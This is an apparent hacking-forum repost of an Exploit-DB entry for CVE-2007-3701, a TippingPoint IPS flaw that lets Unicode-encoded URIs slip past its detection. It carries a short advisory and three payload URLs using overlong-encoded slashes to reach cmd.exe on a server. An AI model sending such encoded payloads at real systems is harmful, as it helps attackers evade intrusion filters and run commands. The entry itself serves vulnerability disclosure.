Exploit TippingPoint IPS - Unicode Character Detection Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30287
Проверка EDB
  1. Пройдено
Автор
SECURITY-ASSESSMENT.COM
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-3701
Дата публикации
2007-07-10
Код:
source: https://www.securityfocus.com/bid/24855/info

TippingPoint IPS is prone to a detection-bypass vulnerability because the appliance fails to properly handle Unicode characters.

A successful exploit of this issue may allow an attacker to bypass the filter and detection system of vulnerable appliances, allowing malicious URI traffic through. This will likely aid the attacker in further attacks.

http://www.example.com/scripts%c0%afcmd.exe
http://www.example.com/scripts%e0%80%afcmd.exe
http://www.example.com/scripts%c1%9ccmd.exe
 
Источник
www.exploit-db.com

Похожие темы